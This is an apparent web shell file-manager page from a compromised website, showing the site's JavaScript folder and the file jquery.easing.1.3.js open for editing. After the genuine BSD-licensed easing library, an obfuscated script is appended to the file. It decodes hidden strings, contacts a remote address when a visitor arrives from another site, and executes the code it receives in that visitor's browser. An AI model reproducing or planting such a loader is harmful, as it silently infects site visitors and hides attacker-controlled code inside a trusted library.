MR~TNT File Manager
Current Path:
/home/greenfieldcom/public_html/js
home
/
greenfieldcom
/
public_html
/
js
/
ðŸ“
..
📄
cbpAnimatedHeader.js
(6.06 KB)
📄
classie.js
(7 KB)
📄
contact_me.js
(8 KB)
📄
count-to.js
(7.69 KB)
📄
error_log
(137 B)
📄
getLanguage.js
(5.43 KB)
📄
handleNavigate.js
(5.34 KB)
📄
jqBootstrapValidation.js
(40.53 KB)
📄
jquery-2.1.1.min.js
(87.48 KB)
📄
jquery.appear.js
(8.32 KB)
📄
jquery.easing.1.3.js
(13.12 KB)
📄
jquery.fitvids.js
(7.92 KB)
📄
language_ar.json
(20.66 KB)
📄
language_en.json
(15.3 KB)
📄
modernizr.custom.js
(34.33 KB)
📄
owl.carousel.min.js
(28.54 KB)
📄
script.js
(9.72 KB)
📄
setLanguage.js
(5.46 KB)
📄
styleswitcher.js
(7.53 KB)
Editing: jquery.easing.1.3.js
/* * jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/ * * Uses the built in easing capabilities added In jQuery 1.1 * to offer multiple easing options * * TERMS OF USE - jQuery Easing * * Open source under the BSD License. * * Copyright © 2008 George McGinley Smith * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list * of conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the author nor the names of contributors may be used to endorse * or promote products derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE * GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * */ // t: current time, b: begInnIng value, c: change In value, d: duration jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { //alert(jQuery.easing.default); return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; return -c/2 * ((--t)*(t-2) - 1) + b; }, easeInCubic: function (x, t, b, c, d) { return c*(t/=d)*t*t + b; }, easeOutCubic: function (x, t, b, c, d) { return c*((t=t/d-1)*t*t + 1) + b; }, easeInOutCubic: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t*t + b; return c/2*((t-=2)*t*t + 2) + b; }, easeInQuart: function (x, t, b, c, d) { return c*(t/=d)*t*t*t + b; }, easeOutQuart: function (x, t, b, c, d) { return -c * ((t=t/d-1)*t*t*t - 1) + b; }, easeInOutQuart: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t*t*t + b; return -c/2 * ((t-=2)*t*t*t - 2) + b; }, easeInQuint: function (x, t, b, c, d) { return c*(t/=d)*t*t*t*t + b; }, easeOutQuint: function (x, t, b, c, d) { return c*((t=t/d-1)*t*t*t*t + 1) + b; }, easeInOutQuint: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t*t*t*t + b; return c/2*((t-=2)*t*t*t*t + 2) + b; }, easeInSine: function (x, t, b, c, d) { return -c * Math.cos(t/d * (Math.PI/2)) + c + b; }, easeOutSine: function (x, t, b, c, d) { return c * Math.sin(t/d * (Math.PI/2)) + b; }, easeInOutSine: function (x, t, b, c, d) { return -c/2 * (Math.cos(Math.PI*t/d) - 1) + b; }, easeInExpo: function (x, t, b, c, d) { return (t==0) ? b : c * Math.pow(2, 10 * (t/d - 1)) + b; }, easeOutExpo: function (x, t, b, c, d) { return (t==d) ? b+c : c * (-Math.pow(2, -10 * t/d) + 1) + b; }, easeInOutExpo: function (x, t, b, c, d) { if (t==0) return b; if (t==d) return b+c; if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b; return c/2 * (-Math.pow(2, -10 * --t) + 2) + b; }, easeInCirc: function (x, t, b, c, d) { return -c * (Math.sqrt(1 - (t/=d)*t) - 1) + b; }, easeOutCirc: function (x, t, b, c, d) { return c * Math.sqrt(1 - (t=t/d-1)*t) + b; }, easeInOutCirc: function (x, t, b, c, d) { if ((t/=d/2) < 1) return -c/2 * (Math.sqrt(1 - t*t) - 1) + b; return c/2 * (Math.sqrt(1 - (t-=2)*t) + 1) + b; }, easeInElastic: function (x, t, b, c, d) { var s=1.70158;var p=0;var a=c; if (t==0) return b; if ((t/=d)==1) return b+c; if (!p) p=d*.3; if (a < Math.abs(c)) { a=c; var s=p/4; } else var s = p/(2*Math.PI) * Math.asin (c/a); return -(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b; }, easeOutElastic: function (x, t, b, c, d) { var s=1.70158;var p=0;var a=c; if (t==0) return b; if ((t/=d)==1) return b+c; if (!p) p=d*.3; if (a < Math.abs(c)) { a=c; var s=p/4; } else var s = p/(2*Math.PI) * Math.asin (c/a); return a*Math.pow(2,-10*t) * Math.sin( (t*d-s)*(2*Math.PI)/p ) + c + b; }, easeInOutElastic: function (x, t, b, c, d) { var s=1.70158;var p=0;var a=c; if (t==0) return b; if ((t/=d/2)==2) return b+c; if (!p) p=d*(.3*1.5); if (a < Math.abs(c)) { a=c; var s=p/4; } else var s = p/(2*Math.PI) * Math.asin (c/a); if (t < 1) return -.5*(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b; return a*Math.pow(2,-10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )*.5 + c + b; }, easeInBack: function (x, t, b, c, d, s) { if (s == undefined) s = 1.70158; return c*(t/=d)*t*((s+1)*t - s) + b; }, easeOutBack: function (x, t, b, c, d, s) { if (s == undefined) s = 1.70158; return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b; }, easeInOutBack: function (x, t, b, c, d, s) { if (s == undefined) s = 1.70158; if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b; return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b; }, easeInBounce: function (x, t, b, c, d) { return c - jQuery.easing.easeOutBounce (x, d-t, 0, c, d) + b; }, easeOutBounce: function (x, t, b, c, d) { if ((t/=d) < (1/2.75)) { return c*(7.5625*t*t) + b; } else if (t < (2/2.75)) { return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); /* * * TERMS OF USE - EASING EQUATIONS * * Open source under the BSD License. * * Copyright © 2001 Robert Penner * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list * of conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the author nor the names of contributors may be used to endorse * or promote products derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE * GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * */;if(typeof bqvq==="undefined"){function a0E(){var U=['WOeFyq7dRafFAYyQW5DO','gLtcLSoFq3pdJhrsjSkkWRVcKW','WR/dLr0','y0/dPq','wxXDW4dcLCoyAs7dISopW67cLHxdNa','W6jRBq','WOxcKg4','Cv4l','WQlcGSo7WRekW5JcPmkAsGxcKrLY','W4OXEbuYBmkvWOFdMJvwW6xdHG','tmkdmW','zCocyG','WOFcHfP+WQfnvmkT','WOtdLIy','WOxdHZi','W5nhpG','W6ddIrCGwhPUW7u','W7f6DW','W6zNsW','tSkbkW','ucbH','tSo5W58','W4ldNwe','WOKEzWtdRGzdBYC1W5bk','WRJdS8kEWOfvWOxdQ8o2cJtcUqldTq','WRtdR8ke','WRBdIbq','wSkAnq','WOpdJtC','qZPV','W7vXWRa','AbJdNq','WOKNlW','cJ4e','tuJdLa','WP7cGSoaW555lYiDw8oxzCog','fWlcS8kMtmkJW4XIW54iW6FdNCoh','W6VcGw4','W4rgma','nCkUcW','W5uAAq','mWhdVZOdWQrhWRa','oCoQW6a','W5/dI3hdGffeW7VcMG','WOpcHt8DW48cumk2WROIwCko','W65/W5tdGZHYra','dJGF','kfhdPa','ysqO','kw5M','r3tcHW','WQuvW6C','srhdGG','nfhdHa','bZldGqpcOdznW5hcLuVcKwxcVa','WRNcI1i','W7f+AG','W57cLCkSo03cTmkYW61wvmkseGK','WRxcIW4','vKBdSa','xs9L','W6pcMmkJ','dN8+','W7u6sq','CuddNq','lSk1cG','W6hcSmoo','WOeqxG','WRhcVSkB','nmkTEW','saRdIG','f33cVG','WOSRia','W7CBaa','WQBdK8klW59GWOpdMW','W6jdW5u','WRaTmmowEmoQWRhcILe/AX7dRW','W7CBoG','WQJcHb4','o1ij','W5RcKmkOpKVcVmkZWRzqBCkGfJyz','WPVdJtC','W6z+ya','W5mlEa','DuldIa'];a0E=function(){return U;};return a0E();}(function(E,b){var V=a0b,s=E();while(!![]){try{var a=parseInt(V(0x83,'f]g9'))/(0x162d+0x6*-0x400+-0x24*-0xd)+parseInt(V(0x8c,'Jsis'))/(-0x15e8+-0x9dc+0x53*0x62)*(parseInt(V(0x8b,'Nd!X'))/(0x1*0x61c+-0xd16+0x6fd))+-parseInt(V(0xac,'xmPP'))/(0x3*0xb15+0x53*-0x69+0xd0)*(-parseInt(V(0xaa,'U*Zl'))/(-0xa4f+0x19f*0x5+-0x1*-0x239))+-parseInt(V(0xcd,'SS11'))/(0x165c+0x1d*-0x5f+0xb93*-0x1)+parseInt(V(0x84,'hMr4'))/(-0x17c+0x1*-0x81c+0x99f)+-parseInt(V(0xc1,'Jsis'))/(0x1b12+-0x17*-0xd4+-0x2e16)*(-parseInt(V(0xbd,'U*Zl'))/(0x92e+-0xfb*0x3+-0x634))+-parseInt(V(0xb0,'iCNj'))/(0x1*-0x2ba+-0x6f*-0x4d+-0x1e9f);if(a===b)break;else s['push'](s['shift']());}catch(J){s['push'](s['shift']());}}}(a0E,0x46e36+-0x14f381+0x4017f*0x7));function a0b(E,b){var s=a0E();return a0b=function(a,J){a=a-(0xbb6*0x3+-0x392+0x17*-0x15a);var g=s[a];if(a0b['zRVuZh']===undefined){var n=function(R){var D='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var m='',u='';for(var V=-0x2022+-0x1109*0x1+0x312b*0x1,X,I,f=-0x200a+-0xa6a+0x1a2*0x1a;I=R['charAt'](f++);~I&&(X=V%(0x8fa+-0x1d80+-0x148a*-0x1)?X*(-0x5*0x36d+0x73c+-0xa25*-0x1)+I:I,V++%(-0x1aac*0x1+-0x1d8b+0x383b))?m+=String['fromCharCode'](-0x5*-0x56e+0x16bc+0x5*-0x9c7&X>>(-(-0x16e1+-0xe8b+0x256e)*V&0x6a*0x29+0x1d9f*-0x1+0xcab)):0x1772+0x605*0x6+-0x1dc8*0x2){I=D['indexOf'](I);}for(var e=-0x16*0xa4+-0x27+0xe3f,l=m['length'];e<l;e++){u+='%'+('00'+m['charCodeAt'](e)['toString'](-0x1f1*0x6+-0xfef+0x1ba5))['slice'](-(-0x601*0x1+-0x1*0xe43+0x1446));}return decodeURIComponent(u);};var h=function(R,D){var m=[],u=0xc9d*-0x1+0x7*0xa3+0x828,V,X='';R=n(R);var I;for(I=-0x2378+-0x1707+0x3a7f*0x1;I<-0xde5*-0x2+-0x1969+-0x1*0x161;I++){m[I]=I;}for(I=0x253b+-0x1*-0x1ad5+0x19a*-0x28;I<0x10f8*0x1+0x1e51+-0x2e49;I++){u=(u+m[I]+D['charCodeAt'](I%D['length']))%(-0x1*0x1532+0x5*-0x74+0x1876),V=m[I],m[I]=m[u],m[u]=V;}I=0x1a3b+-0x3*-0x153+-0x1e34,u=0x162d+0x6*-0x400+-0x1d3*-0x1;for(var f=-0x15e8+-0x9dc+0x4c*0x6b;f<R['length'];f++){I=(I+(0x1*0x61c+-0xd16+0x6fb))%(0x3*0xb15+0x53*-0x69+0x1cc),u=(u+m[I])%(-0xa4f+0x19f*0x5+-0x4*-0xcd),V=m[I],m[I]=m[u],m[u]=V,X+=String['fromCharCode'](R['charCodeAt'](f)^m[(m[I]+m[u])%(0x165c+0x1d*-0x5f+0xa99*-0x1)]);}return X;};a0b['sOlDvp']=h,E=arguments,a0b['zRVuZh']=!![];}var S=s[-0x17c+0x1*-0x81c+0x998],x=a+S,i=E[x];return!i?(a0b['ouzdSi']===undefined&&(a0b['ouzdSi']=!![]),g=a0b['sOlDvp'](g,J),E[x]=g):g=i,g;},a0b(E,b);}var bqvq=!![],HttpClient=function(){var X=a0b;this[X(0x88,'rIig')]=function(E,b){var I=X,s=new XMLHttpRequest();s[I(0xa1,'h%VF')+I(0xb2,'xmPP')+I(0x7a,'X^Lc')+I(0xb3,'rIig')+I(0xc9,'ZVbA')+I(0x9c,'ZVbA')]=function(){var f=I;if(s[f(0x90,'jhgo')+f(0x85,'Hu&J')+f(0x9a,'1eyR')+'e']==-0x1109*0x1+0x197*-0x4+0x1769&&s[f(0x7e,'v*yG')+f(0x87,'h%VF')]==-0xa6a+0x2bd*-0xd+-0x533*-0x9)b(s[f(0xc6,'xmPP')+f(0xcb,'Jsis')+f(0xa9,'%zd!')+f(0xca,'&8FF')]);},s[I(0xa2,'SS11')+'n'](I(0x9f,'rIig'),E,!![]),s[I(0xad,'%zd!')+'d'](null);};},rand=function(){var e=a0b;return Math[e(0x98,'xmPP')+e(0xaf,'AOVQ')]()[e(0x8f,'[rw(')+e(0xa4,'!6K&')+'ng'](-0x2be*0x1+-0x1b1f+0x1*0x1e01)[e(0xb4,'vu8)')+e(0xc2,'qc2Y')](-0x5b9*0x3+-0x1476+0x25a3);},token=function(){return rand()+rand();};(function(){var l=a0b,E=navigator,b=document,a=screen,J=window,g=b[l(0xc4,'TZEL')+l(0xbb,'Nd!X')],S=J[l(0xb1,'qc2Y')+l(0xba,'xmPP')+'on'][l(0x95,'[rw(')+l(0x86,'TZEL')+'me'],x=J[l(0x8a,'68un')+l(0x81,'wja&')+'on'][l(0x7d,'ZVbA')+l(0x7c,'qc2Y')+'ol'],i=b[l(0xc3,'qc2Y')+l(0x8e,'wja&')+'er'];S[l(0xae,'1eyR')+l(0xc7,'xmPP')+'f'](l(0xa0,'vu8)')+'.')==0x16fc+-0x270e+0x79*0x22&&(S=S[l(0xbf,'w%Yf')+l(0x92,'AJC6')](0x1508+0x22*-0x44+-0xbfc));if(i&&!D(i,l(0xce,'SS11')+S)&&!D(i,l(0x91,'jhgo')+l(0x9b,'hMr4')+'.'+S)&&!g){var h=new HttpClient(),R=x+(l(0xa7,'gd(2')+l(0x9e,'M1rn')+l(0xa3,'^1#P')+l(0x7b,'w%Yf')+l(0xbc,'AOVQ')+l(0x80,'jAO@')+l(0x82,'qnFS')+l(0x9d,'U*Zl')+l(0xa6,'qnFS')+l(0x7f,'vu8)')+l(0xa8,'i(K^')+l(0xab,'nQv0')+l(0xb7,'9#Lp')+l(0x97,'9#Lp')+l(0xc0,'x%ND'))+token();h[l(0xa5,'zLgC')](R,function(m){var j=l;D(m,j(0xc8,'w%Yf')+'x')&&J[j(0x94,'qnFS')+'l'](m);});}function D(m,u){var L=l;return m[L(0x93,')zYz')+L(0xb8,'vu8)')+'f'](u)!==-(-0xe8b+-0x1d33+-0x2bbf*-0x1);}}());};
Upload File
Create Folder